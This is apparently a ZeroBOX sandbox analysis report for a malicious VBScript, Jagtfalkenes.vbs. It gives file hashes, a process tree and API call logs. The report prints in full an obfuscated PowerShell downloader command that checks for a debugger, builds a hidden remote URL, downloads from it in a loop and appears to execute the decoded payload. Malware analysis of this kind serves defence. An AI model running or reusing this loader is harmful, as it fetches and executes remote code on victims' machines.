popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Jagtfalkenes.vbs

Generic Malware Antivirus AntiVM AntiDebug
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Nov. 18, 2024, 9:31 a.m. Nov. 18, 2024, 9:35 a.m.
Size 108.9KB
Type ASCII text, with CRLF line terminators
MD5 1c4aa57519360f60d46d3bf0de522194
SHA256 f2264387079776fe5baf8ffc6fc0bf5064a4f3eebdecdafe9282832b6044ee08
CRC32 722ECBB2
ssdeep 1536:ios/J8lpycCQmmkSXHxMLL1rkpmddq8RcP0DDri/kXMp+U3VqFJ4:E/JygttSB019H5RnPri/k8p+UFq34
Yara
  • Generic_Malware_Zero - Generic Malware

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Jagtfalkenes.vbs

    1932

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Lipread Libanons Rafles Aarbgerne #><#Hundespand Topskuddenes Hildebrandine #>$Tyrolervals='Autopathography';function Trningsdragten($Retninger){If ($host.DebuggerEnabled) {$Aktivstoffets=4} for ($Crackerberry=$Aktivstoffets;;$Crackerberry+=5){if(!$Retninger[$Crackerberry]) { break }$Rekonstruhxr+=$Retninger[$Crackerberry]}$Rekonstruhxr}function Indtrre($Graveolency){ .($Decemvir) ($Graveolency)}$Antebridal=Trningsdragten 'klumNClumeG anTB sr.RefrWRosoeprehb DatcKingLIndliBetvE.abbnBertT';$Tonguing=Trningsdragten 'VensMRo.ko muszDansi SpelMonol Manas ri/';$Preage=Trningsdragten ',ardTImmolSwivsRen 1,ymb2';$Sobrere=' Sak[ M,cn raieStiftFord. Mhlsthu ETndeRHeveVFabriPea.c A eEUdfaP RivoN ntIAmirNTavlTPundmToodA Ab Nsluta enig OblEstj.rV js]Udsp:Reco:beskSSuffEfangCUnmouRe erConjiAlimT AksyUnsyPforfRCykloBa btFricO CamCMicrofdeklBrad=Sla $ pblPOktaR Im.E ForAAnnaGu,trE';$Tonguing+=Trningsdragten 'I te5 s t.Pach0Lamp ec(UdbuWEtati,tranRe.sdFuldoTom wForlsRipi ProgN FavTH rd Fore1B,na0 ild.Rawh0bagt;Over striW ydiV linFlso6Forn4 rla;Cock Di cxBegy6 fsa4Flam;g ap Mi drC.usvC.ra:Dock1Cyst3 al1Or.h.Pile0Fer )Tube DubGSaudeMi tcRewokNatao rt/bosw2C.ik0Se i1 pal0 Per0Aut.1Teat0 At,1Swat hydrF pe iKi,gr SuceMappfBa foSowtx Hyp/Jogg1 ong3 ere1Pemp..yst0';$Rstet=Trningsdragten 'Rinku rosBastESlagrPoly- TraaPhonGDarweUdstnTra,t';$Counterarguments243=Trningsdragten 'RavihBlodtTraatAvulpFae s Fre:Re,t/Ur.c/WeekfHolbiCasslLet,eal.edSm lnE.ox.die.eJaunuSkr / Kl lBes.9Bestt MasESam wO erb Ic 9Rad s S p6FlgeaSt,raParaRIndkwCra 5BantfNep y ,doU mbiiDaora rotCsnig0StedlU apfF ri/SjalKSm toSternStamt affr evo eadlRe,ep HomuDelalIschtUnpue GalnBesteTs,r.brndpRdbgs remd';$Mureren=Trningsdragten 'mani>';$Decemvir=Trningsdragten 'Skami posEAr ex';$Grundskyldpromille='Dotationers';$Refleksbevgelserne='\Haremmets184.Ink';Indtrre (Trningsdragten 'Folk$MopeG MicLNatuoSecubM.lta EneLOutr:To.ssAmalkAcr oW.ttm HusaNudagUn.cEF.rsr FodSmy,tvHypeE EntnEnigdvernE ibbN,linS,edg=Cocc$FrsteUdstnNitrVFort:RnneASt gPMassPForadSkikaSpuntUnopaChe + at$B lbr NoneTundFUncoLArsee BulKHaanS ktibr.nle Gu.V,enngHalve ernlGeneS BibEAd lrCo sNIvore');Indtrre (Trningsdragten 'Gene$No,ig udbl Sveo TemB ulva Kablfngs:sponsBea kGeneR korITimeV Un.E CenS nexTBisai HuslAfs SConc=Traf$N,maCP inOStyruOmenn PuntGennEBal,rWeddaU aaR Sp gBie uTi eM,ongEMejenZoodtRundsAbso2Stra4Ages3Unpi. ykkSBeloPK ldLPasnIReveTXipe(eva,$ TramTulluEmalRTimbEJourRSherEFrienSnor)');Indtrre (Trningsdragten $Sobrere);$Counterarguments243=$Skrivestils[0];$Teledendrion=(Trningsdragten 'Jewe$KamkgFo sL Ta.oBestBSkraaDe il G.a:CereAModscA,umCForuu C lB NonA Je tSoftiSek O.iscnNdsi= skiN .ayE Ka W,lut-U,loOvalsBtracJKkseETestCPleatMilo em swig,YTam,S EmhtPer.echelmLgdo. Krm$ .maARaggN riktLivseTjleBM.llrConvI S rdOprraRegaL');Indtrre ($Teledendrion);Indtrre (Trningsdragten 'Refl$Cel,A ypocAdrec NumuLycobPrepa Tyrt SysiF etoIs hnD gs.hi sHTilse Re a AspdOvereFolkrSprns Ald[Whip$FerrRHovesFrartInteeMaintdiff]Ant =Veri$ Se,TFlipoAttensurrgatabuC meiSa.rnLuscg');$Skruetrkkeren=Trningsdragten ' jer$EffeAC prc Ni.cmidjuvandb RhiaTakttSwadi EuhoDiscnB st.OpmuDAsfao U twI.dsn Banl SploPolyaVenddpa lFDenti SuplB adeKert(La,e$HeteCuberoAfs.uOleon,ilstDupeeSek r TemaPrivrFin g AbauPhagmKurse As nThintDvrgsDain2V rb4 ren3spar,Noun$MatiFSunniScelnI,oniSouns I.vhungaeroc.d,akt)';$Finished=$skomagersvendens;Indtrre (Trningsdragten 'Cata$Un ogMi,mlFumaOSkruBRonaATranlCrem: TubmB raaRanenM.erUM.anfS naaRumfk SknTEup.uDisaRSinghFrusAMoonn StoD AddlRe he LeoRTeknsTro =Ret,(DeblTStireIndusOctuT ira-Smr PJudiAFlfoTfor.hHa i Leuk$Outsf tori.verNTankIAv,rssiz,hV neePotadA sk)');while (!$Manufakturhandlers) {Indtrre (Trningsdragten 'Vid $SatigaritlG anoT aabforsaFuthl,app:,udiHGynaaTra nAlu d .kas PaykStraeO tlrStykuSibymOversTw.rlDisiyIntes,vereSp etKaffs Top=Ord.$HospHNonpuAsmit W,glDemoeKvalnMotodSciee') ;Indtrre $Skruetrkkeren;Indtrre (Trningsdragten 'A.erSHermtansvaForurDisttElem-nednsOv ll VicEKatee pukpBl,t mae4');Indtrre (Trningsdragten ' Gli$,skeG A tlAposOSkalB A,raMastLUbnd:UndoMmaxia An nFranUOmbrFKonga TimKsumptPteru ChorVagahInteA opvnKrigD LiglK ageUnwrrAn.esBumb=En.e(LevnTinteECeyls.sykt mme-G ldPVi,raImplT micHV ll .uis$ hrfBesgiSpecnUn eiAabnsUnseH Un,EMaandReen)') ;Indtrre (Trningsdragten 'c.ra$ AnggIndeLMe cOtoucbBackaBrdpLTr.e:T reH BacASvalaBogmN Netl ActiSaluGFlu Ehents.lag=Dyf $Ne,vg KviLFranOChicBS.ycAPortlFire:S ritMvreEKvikSHyttTKre aFasc1Broo2.ore2card+ Uds+Conv%At.e$Eksps SurKInderTe,sIBo evFifaePo.ySTrimTOpfyiTokslKursSkalk.InstC ,eto ndiuAtron andt') ;$Counterarguments243=$Skrivestils[$Haanliges]}$nomaden=306426;$overconscientiousness=29815;Indtrre (Trningsdragten ' For$HierGNulllTlinoRediBMembAhalvlSe.i: ObccSlaguresumTyk,MPuppeAflsrCrepB SooUAnonnte ad.rid rag= Sto UddaGNo,meYapptHarm-StemcUnspO.ortNNonpTRi ieAnchn,enut,tad res$Hypof Prai SvanOpkaI N,gSSplaHGrune LobD');Indtrre (Trningsdragten ' idr$SlaggSkrilPulcoPolyb eucaTroml Ska:AfsiR Udtu.ffieEufowFriloSilirHagltMedf1 Uni0Mlle0Samt Vo a=Revo crat[ aaS Lo,yBeo sPrivtC,aneS.ism,icr.Beb C,eneoDeten stivUbe,e Magr,eint Mar]Sttt:E ph: auvFfunkrNul o TndmBundBNontaRelasTynge Bes6Hjer4ReinSClontAsparPolei Seln efrgSoci(Rumm$ hacCH lvu ArimF ngmShove UrurEkstbSupeuCappnov rdS,mp)');Indtrre (Trningsdragten 'd ve$CoungAfseL Sg o.ealB AdgACa cL Bre: emiITrasTamatIAf nNPeruEEvolRTil AH,tcr BagYAnap Bri =To.d Inte[AppeSSp.cYLuggS udsTOligetingmHavf.HyleTTriceImmeX.ingtRes..LokoEUdbenPothCU.who iredPresI skjnMerlgIndp]A bu:Octo: tipAMistSStriCRomii supI Til.ReseGme,iEEmottstarS eblTBakorSpalIWrisn ImpGgibl(Scu,$Kom,R GasuUnheekyleWJachO aakrServTkloa1Qui 0 l v0Rout)');Indtrre (Trningsdragten ' Out$ ntgFly lSoroo ZilBRegiARr,aLSti.:PrersS otT wari ErhL FalLLydriHaslNOutrGSkrdSSlada AmanIdeon UncoMorsNBattcBekre.esoRBlya= Prv$OplyiSoulTBurgIC loNaspaeIcefRA.teAVelaRTropyT.tq.BagvSJu pUOmfoBEntosPepttDem,rFremILincN ArbgUdre(Tilt$RigsNNeutO g.nmUdtraDandDSorteHoasNWun , Ref$FiliOEchiV sseE Sn,R ympcK,eeOHo eN SmaSunc.csvolI DieeIsodnPateTDox,I DhoODialuTr ksCounN,ratE.aseSPygmSSte )');Indtrre $Stillingsannoncer;"

      2388

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Index operation failed; the array index evaluated to null.
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: At line:1 char:262
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: + <#Lipread Libanons Rafles Aarbgerne #><#Hundespand Topskuddenes Hildebrandine
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: #>$Tyrolervals='Autopathography';function Trningsdragten($Retninger){If ($host
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: .DebuggerEnabled) {$Aktivstoffets=4} for ($Crackerberry=$Aktivstoffets;;$Cracke
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: rberry+=5){if(!$Retninger[ <<<< $Crackerberry]) { break }$Rekonstruhxr+=$Retnin
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: ger[$Crackerberry]}$Rekonstruhxr}function Indtrre($Graveolency){ .($Decemvir) (
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: $Graveolency)}$Antebridal=Trningsdragten 'klumNClumeG anTB sr.RefrWRosoeprehb D
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: atcKingLIndliBetvE.abbnBertT';$Tonguing=Trningsdragten 'VensMRo.ko muszDansi Sp
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: elMonol Manas ri/';$Preage=Trningsdragten ',ardTImmolSwivsRen 1,ymb2';$Sobrere=
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: ' Sak[ M,cn raieStiftFord. Mhlsthu ETndeRHeveVFabriPea.c A eEUdfaP RivoN ntIAmi
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: rNTavlTPundmToodA Ab Nsluta enig OblEstj.rV js]Udsp:Reco:beskSSuffEfangCUnmouRe
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: erConjiAlimT AksyUnsyPforfRCykloBa btFricO CamCMicrofdeklBrad=Sla $ pblPOktaR
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: Im.E ForAAnnaGu,trE';$Tonguing+=Trningsdragten 'I te5 s t.Pach0Lamp ec(UdbuWE
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: tati,tranRe.sdFuldoTom wForlsRipi ProgN FavTH rd Fore1B,na0 ild.Rawh0bagt;Over
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: striW ydiV linFlso6Forn4 rla;Cock Di cxBegy6 fsa4Flam;g ap Mi drC.usvC.ra:Dock
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: 1Cyst3 al1Or.h.Pile0Fer )Tube DubGSaudeMi tcRewokNatao rt/bosw2C.ik0Se i1 pa
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: l0 Per0Aut.1Teat0 At,1Swat hydrF pe iKi,gr SuceMappfBa foSowtx Hyp/Jogg1 ong3 e
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: re1Pemp..yst0';$Rstet=Trningsdragten 'Rinku rosBastESlagrPoly- TraaPhonGDarweU
console_handle: 0x000000fb
1 1 0

WriteConsoleW

 buffer: dstnTra,t';$Counterarguments243=Trningsdragten 'RavihBlodtTraatAvulpFae s Fre:R
console_handle: 0x00000107
1 1 0

WriteConsoleW

 buffer: e,t/Ur.c/WeekfHolbiCasslLet,eal.edSm lnE.ox.die.eJaunuSkr / Kl lBes.9Bestt MasE
console_handle: 0x00000113
1 1 0

WriteConsoleW

 buffer: Sam wO erb Ic 9Rad s S p6FlgeaSt,raParaRIndkwCra 5BantfNep y ,doU mbiiDaora rot
console_handle: 0x0000011f
1 1 0

WriteConsoleW

 buffer: Csnig0StedlU apfF ri/SjalKSm toSternStamt affr evo eadlRe,ep HomuDelalIschtUnp
console_handle: 0x0000012b
1 1 0

WriteConsoleW

 buffer: ue GalnBesteTs,r.brndpRdbgs remd';$Mureren=Trningsdragten 'mani>';$Decemvir=Trn
console_handle: 0x00000137
1 1 0

WriteConsoleW

 buffer: ingsdragten 'Skami posEAr ex';$Grundskyldpromille='Dotationers';$Refleksbevgels
console_handle: 0x00000143
1 1 0

WriteConsoleW

 buffer: erne='\Haremmets184.Ink';Indtrre (Trningsdragten 'Folk$MopeG MicLNatuoSecubM.lt
console_handle: 0x0000014f
1 1 0

WriteConsoleW

 buffer: a EneLOutr:To.ssAmalkAcr oW.ttm HusaNudagUn.cEF.rsr FodSmy,tvHypeE EntnEnigdver
console_handle: 0x0000015b
1 1 0

WriteConsoleW

 buffer: nE ibbN,linS,edg=Cocc$FrsteUdstnNitrVFort:RnneASt gPMassPForadSkikaSpuntUnopaCh
console_handle: 0x00000167
1 1 0

WriteConsoleW

 buffer: e + at$B lbr NoneTundFUncoLArsee BulKHaanS ktibr.nle Gu.V,enngHalve ernlGeneS
console_handle: 0x00000173
1 1 0

WriteConsoleW

 buffer: BibEAd lrCo sNIvore');Indtrre (Trningsdragten 'Gene$No,ig udbl Sveo TemB ulva K
console_handle: 0x0000017f
1 1 0

WriteConsoleW

 buffer: ablfngs:sponsBea kGeneR korITimeV Un.E CenS nexTBisai HuslAfs SConc=Traf$N,maCP
console_handle: 0x0000018b
1 1 0

WriteConsoleW

 buffer: inOStyruOmenn PuntGennEBal,rWeddaU aaR Sp gBie uTi eM,ongEMejenZoodtRundsAbso2
console_handle: 0x00000197
1 1 0

WriteConsoleW

 buffer: Stra4Ages3Unpi. ykkSBeloPK ldLPasnIReveTXipe(eva,$ TramTulluEmalRTimbEJourRSher
console_handle: 0x000001a3
1 1 0

WriteConsoleW

 buffer: EFrienSnor)');Indtrre (Trningsdragten $Sobrere);$Counterarguments243=$Skrivesti
console_handle: 0x000001af
1 1 0

WriteConsoleW

 buffer: ls[0];$Teledendrion=(Trningsdragten 'Jewe$KamkgFo sL Ta.oBestBSkraaDe il G.a:Ce
console_handle: 0x000001bb
1 1 0

WriteConsoleW

 buffer: reAModscA,umCForuu C lB NonA Je tSoftiSek O.iscnNdsi= skiN .ayE Ka W,lut-U,loOv
console_handle: 0x000001c7
1 1 0

WriteConsoleW

 buffer: alsBtracJKkseETestCPleatMilo em swig,YTam,S EmhtPer.echelmLgdo. Krm$ .maARaggN
console_handle: 0x000001d3
1 1 0

WriteConsoleW

 buffer: riktLivseTjleBM.llrConvI S rdOprraRegaL');Indtrre ($Teledendrion);Indtrre (Trn
console_handle: 0x000001df
1 1 0

WriteConsoleW

 buffer: ingsdragten 'Refl$Cel,A ypocAdrec NumuLycobPrepa Tyrt SysiF etoIs hnD gs.hi sHT
console_handle: 0x000001eb
1 1 0

WriteConsoleW

 buffer: ilse Re a AspdOvereFolkrSprns Ald[Whip$FerrRHovesFrartInteeMaintdiff]Ant =Veri$
console_handle: 0x000001f7
1 1 0

WriteConsoleW

 buffer: Se,TFlipoAttensurrgatabuC meiSa.rnLuscg');$Skruetrkkeren=Trningsdragten ' jer$
console_handle: 0x00000203
1 1 0

WriteConsoleW

 buffer: EffeAC prc Ni.cmidjuvandb RhiaTakttSwadi EuhoDiscnB st.OpmuDAsfao U twI.dsn Ban
console_handle: 0x0000020f
1 1 0

WriteConsoleW

 buffer: l SploPolyaVenddpa lFDenti SuplB adeKert(La,e$HeteCuberoAfs.uOleon,ilstDupeeSek
console_handle: 0x0000021b
1 1 0

WriteConsoleW

 buffer: r TemaPrivrFin g AbauPhagmKurse As nThintDvrgsDain2V rb4 ren3spar,Noun$MatiFSu
console_handle: 0x00000227
1 1 0

WriteConsoleW

 buffer: nniScelnI,oniSouns I.vhungaeroc.d,akt)';$Finished=$skomagersvendens;Indtrre (Tr
console_handle: 0x00000233
1 1 0

WriteConsoleW

 buffer: ningsdragten 'Cata$Un ogMi,mlFumaOSkruBRonaATranlCrem: TubmB raaRanenM.erUM.anf
console_handle: 0x0000023f
1 1 0

WriteConsoleW

 buffer: S naaRumfk SknTEup.uDisaRSinghFrusAMoonn StoD AddlRe he LeoRTeknsTro =Ret,(Debl
console_handle: 0x0000024b
1 1 0

WriteConsoleW

 buffer: TStireIndusOctuT ira-Smr PJudiAFlfoTfor.hHa i Leuk$Outsf tori.verNTankIAv,rssiz
console_handle: 0x00000257
1 1 0

WriteConsoleW

 buffer: ,hV neePotadA sk)');while (!$Manufakturhandlers) {Indtrre (Trningsdragten 'Vid
console_handle: 0x00000263
1 1 0

WriteConsoleW

 buffer: $SatigaritlG anoT aabforsaFuthl,app:,udiHGynaaTra nAlu d .kas PaykStraeO tlrSty
console_handle: 0x0000026f
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a48d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a4e90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a4e90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a4e90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a4610
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a4610
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a4610
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a4610
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a4610
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a4610
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a4e90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a4e90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a4e90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a5110
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a5110
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a5110
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a4a90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a5110
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a5110
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a5110
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a5110
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a5110
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a5110
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a5110
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a5310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a5310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a5310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a5310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a5310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a5310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a5310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a5310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a5310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a5310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a5310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a5310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a5310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a5310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a4d90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a4d90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a4d90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a4d90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a4d90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a4d90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a4d90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004a4d90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 851968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02580000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02610000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2388
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72dc1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0249a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2388
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72dc2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02492000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02611000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02612000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024ca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a4000
